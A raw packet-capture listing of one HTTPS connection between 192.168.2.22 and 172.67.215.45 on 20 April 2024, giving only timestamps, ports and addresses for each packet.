Apr 20, 2024 11:36:05.897440910 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.897442102 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.897450924 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.897490978 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.898293018 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.898370028 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.898371935 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.898380041 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.898411989 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.899287939 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.899346113 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.899353981 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.899374962 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.899427891 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.899432898 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.900417089 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.900461912 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.900501013 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.900507927 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.900517941 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.901326895 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.901380062 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.901385069 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.901397943 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.901441097 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.901447058 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.902453899 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.902508020 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.902513981 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.902780056 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.902826071 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.902832985 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.903248072 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.903297901 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.903304100 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.904405117 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.904447079 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.904463053 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.904469967 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.904501915 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.906332016 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.906367064 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.906418085 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.906429052 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.906447887 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.909008980 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.909038067 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.909073114 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.909077883 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.909107924 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.910909891 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.910969019 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.948415041 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.948426008 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.948446989 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.948453903 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.948710918 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.948710918 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.948721886 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.948807001 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.949467897 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.949472904 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.949526072 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.949798107 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.949800968 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.949809074 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.949855089 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.949858904 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.949882984 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.950948000 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.951116085 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:05.999175072 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:05.999207020 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.000602007 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.000642061 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.002031088 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.002044916 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.002078056 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.002516985 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.002545118 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.002585888 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.002593040 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.002620935 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.004504919 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.004535913 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.004565954 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.004570961 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.004595041 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.006381035 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.006414890 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.006441116 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.006447077 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.006474018 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.008548975 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.008583069 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.008609056 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.008614063 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.008639097 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.010489941 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.010519028 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.010557890 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.010566950 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.010580063 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.012357950 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.012403965 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.012443066 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.012449026 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.012468100 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.015047073 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.015074968 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.015108109 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.015115976 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.015140057 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.016614914 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.016661882 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.016671896 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.016678095 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.016720057 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.018490076 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.018517017 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.018553972 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.018558979 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.018568993 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.020351887 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.020385981 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.020416021 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.020421028 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.020446062 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.023001909 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.023037910 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.023101091 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.023108959 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.023129940 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.024959087 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.024992943 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.025024891 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.025032997 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.025043964 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.026472092 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.026501894 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.026536942 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.026542902 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.026561975 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.029083967 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.029119015 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.029159069 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.029167891 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.029185057 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.031080008 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.031105995 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.031143904 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.031152964 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.031173944 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.033010960 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.033045053 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.033077002 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.033085108 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.033129930 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.034801960 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.034830093 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.034867048 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.034874916 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.034888983 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.037074089 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.037106991 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.037137985 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.037143946 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.037316084 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.038968086 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.038997889 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.039027929 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.039035082 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.039052963 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.040895939 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.040929079 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.040960073 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.040966988 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.040992022 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.042859077 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.042887926 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.042953968 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.042963982 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.043018103 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.044807911 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.044857025 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.044893980 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.044902086 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.044918060 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.046940088 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.046983004 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.047003031 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.047008038 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.047029972 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.047049999 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.048856974 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.048894882 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.048922062 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.048928022 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.048952103 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.050806046 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.050838947 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.050858021 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.050862074 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.050901890 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.052092075 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.102264881 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.102304935 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.102418900 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.102431059 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.102468967 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.104187012 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.104223967 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.104259968 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.104266882 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.104279041 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.106488943 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.106518030 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.106554031 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.106560946 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.106570959 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.108336926 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.108372927 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.108400106 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.108407021 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.108417034 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.110234976 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.110264063 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.110294104 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.110300064 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.110318899 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.112154961 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.112188101 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.112211943 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.112219095 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.112241983 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.114447117 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.114475012 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.114527941 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.114535093 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.114550114 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.116338968 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.116373062 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.116394997 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.116400957 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.116411924 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.116451025 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.118323088 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.118355036 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.118387938 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.118392944 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.118413925 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.120848894 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.120882034 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.120909929 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.120920897 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.120938063 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.122414112 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.122442007 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.122469902 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.122477055 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.122489929 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.124376059 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.124403000 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.124435902 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.124442101 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.124453068 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.126230001 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.126257896 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.126312971 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.126319885 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.126331091 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.128153086 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.128182888 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.128216982 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.128222942 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.128233910 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.130707026 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.130736113 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.130760908 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.130768061 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.130800962 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.132311106 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.132343054 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.132371902 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.132376909 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.132390976 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.134227037 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.134259939 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.134294033 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.134299040 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.134318113 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.136851072 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.136930943 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.169503927 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.169511080 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.169542074 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.169549942 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.169668913 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.169675112 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.169692039 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.169711113 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.169717073 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.169723988 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.169743061 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.169805050 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.169830084 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.169878960 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.174263954 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.174271107 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.174323082 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.174474001 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.174482107 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.174504042 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.174525023 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.174613953 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.174633980 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.174638987 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.174679995 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.174710989 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.176266909 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.176306009 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.176332951 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.176338911 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.176356077 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.177257061 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.177285910 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.177313089 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.177319050 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.177342892 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.178184986 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.178431034 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.179096937 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.179131031 CEST	443	49164	172.67.215.45	192.168.2.22
